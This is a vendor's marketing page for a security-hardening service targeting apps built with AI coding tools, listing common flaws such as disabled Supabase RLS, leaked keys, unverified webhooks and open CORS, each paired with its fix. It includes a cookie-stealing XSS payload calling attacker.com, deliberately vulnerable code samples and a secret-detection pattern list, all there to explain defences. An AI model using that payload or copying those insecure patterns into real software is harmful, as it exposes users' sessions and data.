AI app security hardening — patch the RLS, secrets, and webhook gaps Lovable and Bolt shipped with
AI app security hardening is not optional. 48% of AI-generated code ships with vulnerabilities, Supabase RLS hardening is skipped on ~70% of Lovable apps, webhook signature verification is absent, and a full secrets audit of an AI app usually finds keys in the client bundle. We audit every OWASP category, patch RLS, rotate secrets, sign webhooks, and ship a written report in 48 hours for a fixed $499. Updated Q2 2026: OWASP Top 10 for LLM Applications v2.0 was released in January and most AI-built apps hit 7+ of the 10, and California AB-2630 went into effect April 2026 requiring breach disclosure for AI-generated apps.
Why AI builders ship broken AI app security hardening
Security is the thing AI coding tools are worst at, by a wide margin. Veracode's 2025 report found 48% of AI-generated code contains vulnerabilities — roughly one in two files. The Register documented 170 Lovable apps leaking data from over 18,000 users in a single incident. NIST assigned CVE-2025-53773 (CVSS 9.6) to GitHub Copilot. The problem isn't a bad prompt; it's that the models optimise for demo-ability, and every security control is friction on the demo.
The specific patterns we see almost every time: Supabase Row Level Security disabled (or 'enabled' with policies that allow anyone to read everything), secrets hardcoded into the client bundle, OAuth callbacks misconfigured so tokens are exchanged insecurely, no rate limits so your app can be scraped or DoS'd, CSRF protection missing on mutating endpoints, user input passed straight to SQL or HTML, CORS set to '*' because that was the fastest way to make the preview work. Every one of these is catastrophic at launch. Every one is a half-day fix if you know what you're doing. New in Q1 2026: we are now seeing prompt injection attacks against AI-generated admin dashboards — LLM-backed features (summaries, inline copilots, chat panels) that accept user-supplied text without sanitization can be steered into exfiltrating private data, and AI builders rarely ship the allowlist checks that stop it.
Source: The Register — 170 Lovable apps leaked 18k users' data
Which AI builder shipped your broken AI app security hardening?
The AI app security hardening failure mode usually depends on the tool that shipped the code. Find your builder below, then read the matching problem page.
| AI builder | What breaks in AI app security hardening | Go to |
|---|---|---|
| Lovable | RLS disabled on ~70% of apps; Supabase public key granting full access | Lovable RLS fix → |
| Bolt.new | Hardcoded secrets in client bundle; Stripe webhooks unverified | Bolt security → |
| v0 | Backend-less; when added, no rate limits, no input validation | v0 auth → |
| Cursor | Security drifts across files; OAuth flow sometimes split insecurely | Cursor rescue → |
| Replit Agent | Secrets in repl env exposed; public URLs default | Replit rescue → |
| Claude Code | Generally better — still misses rate limits and CORS hardening | Claude Code rescue → |
| Windsurf | Enterprise compliance gaps — audit logs, RBAC, SSO misconfig | Windsurf compliance → |
| Base44 | Proprietary runtime; we audit and migrate to owned stack if needed | Base44 rescue → |
Anatomy of the 170-Lovable-apps breach — and how AI-built apps keep repeating it
The Register documented the pattern in February 2026: 170 Lovable-built apps leaked data from over 18,000 users in a single disclosure wave. The failure mode, quoted directly from the case study, was 'authenticated users were blocked; unauthenticated visitors had full access to all data.' That is not a missing policy — that is an inverted policy. The RLS rule was present, but its condition was reversed, and the Supabase anon key (which ships in every client bundle by design) became an open door to the entire database.
The upstream cause is demo-ability. Lovable, Bolt, v0, and their peers optimize for the moment the founder says 'wow, it works.' Every security control adds friction to that moment. RLS breaks the happy path during iteration, so the AI disables it. Rate limits make the model's test loop slow, so they go unimplemented. CORS restrictions block the preview, so CORS gets set to '*' and stays that way. Webhook signing secrets require a production environment to test, so the webhook handler just returns 200. Every individual decision is pragmatic for the demo and catastrophic at launch.
“A practical illustration: a seed-stage SaaS reached us two days before their pen-test.”
A practical illustration: a seed-stage SaaS reached us two days before their pen-test. Bolt.new had shipped them an admin panel gated by a client-side `if (user.role === 'admin') { show(<AdminPanel/>) }` check. The route itself was not protected server-side. A single DevTools edit to the user object bypassed the gate and exposed every admin API the UI called. The admin APIs, in turn, trusted the client's claim because the AI had not written server-side role verification. The pen-tester would have found it in ten minutes. We fixed it in two hours: role checks moved to server middleware, RLS policies added for admin-scoped tables, and a test that logs in as a regular user and attempts every admin route was wired into CI. The pen-test report came back clean on those vectors. The founder asked, justifiably: how was this ever supposed to work? It wasn't. The AI shipped the shape of a secured admin panel without the substance.
Veracode's 2025 State of Software Security confirmed the scale: 48% of AI-generated code contains known vulnerabilities. That is not a prediction — it is measured across a multi-year benchmark. Combined with NIST's CVE-2025-53773 (CVSS 9.6) against GitHub Copilot's auto-generated code paths, the evidence is unambiguous: AI-generated code is materially less secure than human-generated equivalent, and the delta is not shrinking. A security hardening pass is not optional for a launched AI-built app; it is the difference between running a real business and making the next disclosure headline.
When we audit, the same eight categories surface over and over: RLS disabled or inverted, secrets in the client bundle, webhook handlers without signature checks, CORS set to '*', no rate limiting, input pipes straight to SQL or HTML, OAuth redirects leaking tokens in URL fragments, and missing security headers (CSP, HSTS, X-Frame-Options). Each is a 2-to-8 hour fix individually. The value of the engagement is that we do them all, consistently, before a real user — or a researcher — finds them for you.
What a AI app security hardening rescue engagement ships
From first diagnostic to production handoff — the explicit steps on every AI app security hardening engagement.
- 01
Free diagnostic
We scan your repo and live URL for the top 10 AI-built-app failure modes: RLS, secrets, CORS, webhooks, rate limits, auth, input validation, CSP, CSRF, IDOR. Written triage in 48 hours.
- 02
$499 security audit
Full written audit — every finding has severity (critical/high/medium/low), CWE reference, file/line, and a specific patch. Delivered in 48 hours.
- 03
Critical fixes first
We patch everything critical and high in the same engagement if you want — RLS policies written and tested, secrets rotated and moved to env, webhook signature verification added, rate limits wired up.
- 04
Regression guards
We add automated checks so the AI can't reintroduce the holes: Zod validation at API boundaries, CSP headers, lint rules banning dangerouslySetInnerHTML, CI checks for hardcoded secrets.
- 05
Written handoff
You get the report, the patches, and a runbook: what to watch, what to rotate annually, what to add to the pentest when you raise your Series A.
Every AI app security hardening rescue audit checks
The diagnostic pass on every AI app security hardening rescue. Each item takes under 10 minutes; together they cover the patterns that cause 90% of AI-built-app failures.
- 01Supabase RLS on every table
We enumerate every table and check: is RLS enabled, and is at least one non-trivial policy defined. Policies like `USING (true)` are flagged — they satisfy the 'enabled' check without enforcing anything.
- 02Anon-key surface mapping
We map every read and write the anon key can perform. If the anon key can read any user-private table, it's critical.
- 03Secrets grep across client bundle
The built JS bundle is greppable. We search for sk_, sk_live, sk_test, service_role, API_KEY, common secret patterns. Every match is a critical finding.
- 04Webhook signature verification
Stripe, GitHub, Clerk — every webhook handler must verify the signature before acting. Unverified handlers are trivially forgeable.
- 05Rate limits on auth endpoints
Sign-up, sign-in, password reset. No rate limit means DoS-able and brute-forceable. We check for Upstash, Vercel Edge rate limits, or middleware.
- 06Input validation with Zod or equivalent
Every API route must parse req.body before it reaches the database. Raw concatenation into SQL or HTML is a critical finding (OWASP A03).
- 07CORS policy
Access-Control-Allow-Origin should be an explicit allowlist, not '*'. We check every API response.
- 08CSP, HSTS, and security headers
We run Mozilla Observatory against the live URL. Scores under B are flagged; we tune next.config.js to ship the right headers.
- 09OAuth redirect and token flow
Tokens should arrive via POST, not URL fragment. Redirect URIs should exactly match provider allowlists. Token refresh should be server-side.
- 10IDOR checks on object access
Can user A access user B's object by guessing the ID? We test every authenticated GET, PATCH, DELETE with the wrong user's UUID.
- 11Dependency CVE scan
npm audit or pnpm audit, cross-referenced with NIST NVD. Known criticals in shipped dependencies are flagged.
Common AI app security hardening patterns we fix
These are the shapes AI-generated code arrives in — and the shape we leave behind.
01`ALTER TABLE users DISABLE ROW LEVEL SECURITY;` — anon key reads and writes every row. 170-Lovable-apps pattern.01RLS enabled; policies scoped with `auth.uid() = user_id` on owning tables and role-checked on admin tables. Tested against every role.01`export async function POST(req) { const body = await req.json(); await markOrderPaid(body.order_id); return new Response('ok'); }` — anyone can POST.01Stripe-Signature header parsed, constructEvent called with the webhook secret, handler runs only on verified events. Idempotency key stored to prevent replay.01`NEXT_PUBLIC_SUPABASE_SERVICE_ROLE_KEY=...` in .env. Key ships in the client bundle. App has full admin access from any user's browser.01Service role key confined to server routes and environment. Client uses anon key only. Env var name without NEXT_PUBLIC_ prefix, pre-flight check enforces this.01`Access-Control-Allow-Origin: *` on every API response. Any origin can call your API with browser-held cookies.01Explicit allowlist keyed to deployment environment. Production allows only your domain; preview allows your preview URL.01`create function search(q text) returns table(...) as $$ ... where name like '%' || q || '%' $$` — injection trivial once quoted.01Parameterized queries, `format()` with `%L` or prepared statements, input validation before the call.01Comments or bios rendered via `dangerouslySetInnerHTML`. User injects `<script>fetch('https://attacker.com/?c='+document.cookie)</script>`.01DOMPurify sanitization, or render as plain text, or restrict to a markdown subset with a vetted renderer.01OAuth callback returns `#access_token=...` which JavaScript parses client-side. Tokens leak to analytics, referrers, browser history.01PKCE + server-side token exchange. Tokens never touch the URL. Session cookie set HttpOnly, Secure, SameSite=Lax.AI app security hardening red flags in AI-built code
If any of these are true in your repo, the rescue is probably worth more than the rewrite.
Fixed-price AI app security hardening engagements
No hourly meter. Scope agreed up front, written fix plan, delivered on date.
- turnaround
- Security audit
- scope
- Full written audit, 48hr turnaround, every finding with a patch.
- turnaround
- Break the fix loop
- scope
- Audit + critical fixes + regression guards + tests.
What AI app security hardening rescues actually cost
Anonymized, representative scopes from recent AI app security hardening rescues. Every price is the one we actually quoted.
A founder who built a Lovable habit-tracker, has 90 beta users, and is scared to launch publicly after reading The Register piece. We audit, find 11 findings (3 critical), write the RLS policies and wire webhook signing.
- Scope
- 48-hour audit + critical and high remediation. RLS policies, webhook signing, secret rotation, env var guards.
- Duration
- 1 week
A seed-stage SaaS on Bolt + Supabase preparing for SOC 2 Type 1. Enterprise customer asked for a third-party security review in the sales cycle.
- Scope
- Full audit, remediation of every critical and high, CSP implementation, audit log bootstrap, pen-test prep document.
- Duration
- 3 weeks
A growth-stage fintech with a Lovable admin tool processing real money. Regulatory inquiry triggered a security review with a 60-day remediation window.
- Scope
- Full audit, remediation including auth overhaul, RBAC, audit logs, SIEM integration, and formal response to the inquiry's findings.
- Duration
- 6-8 weeks
Patch in place, hard-rotate secrets, or full auth migration?
Roughly 70% of security engagements are patches in place: enable RLS, sign the webhooks, move secrets to server-side env vars, deploy security headers. The app stays where it is, the team keeps using their AI builder, and the rescue ships in a week. Most rescues fall into this category and they end with the original codebase materially safer with no architectural change.
About 20% require a hard secret rotation alongside the patches. The signal is that secrets have been in the client bundle for long enough — or visible in a public Git history — that the right assumption is they are compromised. Stripe restricted keys can be revoked in seconds; Supabase service role keys require a project-level rotation that can disrupt active sessions; OAuth client secrets need coordination with the provider's allowlist. We sequence the rotation to minimize user impact and document every step in case a future incident requires re-examining the timeline.
The remaining 10% need a full auth migration. The signal is that the auth provider itself has been mis-implemented in a way that can't be patched cleanly — for example, sessions stored in localStorage instead of HttpOnly cookies, or roles stored in the JWT claim without server-side verification. In those cases we recommend moving to Clerk or rebuilding on Supabase Auth with the patterns done correctly. The migration is invisible to most users (passwordless re-verification email plus a one-shot token exchange) but it does require a planned cutover window and a rollback plan. We have done this many times and the pattern is now standard.
AI app security hardening runbook and reference material
The documentation, CLIs, and specs we rely on for every AI app security hardeningengagement. We cite, we don't improvise.
- OWASP Top 10 (2024)
The industry baseline for web application security findings.
- Supabase — Row Level Security
The canonical reference for RLS patterns we write and verify.
- Stripe — Webhook signature verification
Every Stripe webhook audit starts here.
- Mozilla Observatory
Our automated headers and TLS check for every live URL.
- NIST NVD — CVE database
Cross-reference for dependency and vendor findings.
- The Register (Feb 2026) — Lovable vulnerability disclosure
Cited in every audit report's executive summary.
- Next.js — Content Security Policy
The CSP config we deploy for Next.js apps on Vercel.
AI app security hardeningrescues we've shipped
Related AI app security hardening specialists
Full AI-built app code audit beyond security — architecture, perf, test coverage, TypeScript strictness.
Supabase RLS hardening, auth flow, realtime channels, storage bucket policies — the whole Supabase security surface.
OAuth callbacks, session refresh, RBAC, SSO — auth bugs that sit adjacent to AI app security hardening.
Related AI app security hardening problems we rescue
Fintech-specific AI app security hardening — KYC, PII, PCI-adjacent auditing, data-residency review.
Healthtech AI app security hardening — PHI handling, HIPAA-aware architecture, audit logs for Supabase.
The explainer behind the #1 AI app security hardening finding.
The pre-launch secrets audit AI app checklist — every category we run before a production deploy.
The core AI app security hardening service — 48-hour written report with patches.
Lovable-specific Supabase RLS hardening and webhook signature verification.
AI app security hardening questions founders ask
Sources cited in this dossier
- Veracode 2025 State of Software Security — AI code
- The Register (Feb 2026) — 170 Lovable apps, 18k users exposed
- NIST NVD — CVE-2025-53773 (GitHub Copilot, CVSS 9.6)
- OWASP Top 10 (2024)
- Supabase — Row Level Security docs
- Stripe — Webhook signature verification
- Mozilla Observatory — security headers scanner
- Next.js — Content Security Policy
Your AI builder shipped broken AI app security hardening. We ship the fix.
Send the repo. We'll tell you exactly what's wrong in your AI app security hardening layer — and the fixed price to ship it — in 48 hours.
Book free diagnostic →